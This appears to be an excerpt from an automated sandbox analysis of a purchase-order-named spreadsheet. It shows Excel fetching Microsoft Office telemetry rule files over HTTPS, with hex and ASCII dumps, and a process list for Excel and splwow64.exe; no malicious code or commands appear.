                2025-03-15 08:08:23 UTC16384INData Raw: 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35
                Data Ascii: ="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L> <S T="5


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.44973513.107.246.604437860C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                TimestampBytes transferredDirectionData
                2025-03-15 08:08:29 UTC214OUTGET /rules/rule120607v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                Host: otelrules.svc.static.microsoft
                2025-03-15 08:08:29 UTC491INHTTP/1.1 200 OK
                Date: Sat, 15 Mar 2025 08:08:29 GMT
                Content-Type: text/xml
                Content-Length: 204
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                ETag: "0x8DC582BB6C8527A"
                x-ms-request-id: c0f87a84-101e-0017-0c46-9547c7000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20250315T080829Z-186895dd8bdsf9rwhC1EWR00un00000005u0000000001s50
                x-fd-int-roxy-purgeid: 0
                X-Cache-Info: L1_T2
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2025-03-15 08:08:29 UTC204INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 37 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 45 52 3d 22 31 32 30 36 30 33 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 62 70 7a 73 22 20 41 3d 22 39 34 30 74 63 20 39 78 35 6a 73 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120607" V="1" DC="SM" T="Subrule" ER="120603" xmlns=""> <S> <UTS T="1" Id="bbpzs" A="940tc 9x5js" /> </S> <T> <S T="1" /> </T></R>


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                2192.168.2.44973413.107.246.604437860C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                TimestampBytes transferredDirectionData
                2025-03-15 08:08:29 UTC214OUTGET /rules/rule120603v8s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                Host: otelrules.svc.static.microsoft
                2025-03-15 08:08:29 UTC494INHTTP/1.1 200 OK
                Date: Sat, 15 Mar 2025 08:08:29 GMT
                Content-Type: text/xml
                Content-Length: 2128
                Connection: close
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                ETag: "0x8DC582BA41F3C62"
                x-ms-request-id: cf00022c-201e-0096-2759-95ace6000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20250315T080829Z-186895dd8bdhmxsmhC1EWRkd5g00000006cg000000001zr2
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2025-03-15 08:08:29 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:04:07:12
                Start date:15/03/2025
                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                Imagebase:0xa30000
                File size:53'161'064 bytes
                MD5 hash:4A871771235598812032C822E6F68F19
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:14
                Start time:04:08:18
                Start date:15/03/2025
                Path:C:\Windows\splwow64.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\splwow64.exe 12288
                Imagebase:0x7ff626c00000
                File size:163'840 bytes
                MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                Target ID:16
                Start time:04:08:26
                Start date:15/03/2025
                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO-ARJ-2025-15ACA.xla.xlsx"
                Imagebase:0xa30000
                File size:53'161'064 bytes
                MD5 hash:4A871771235598812032C822E6F68F19
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                No disassembly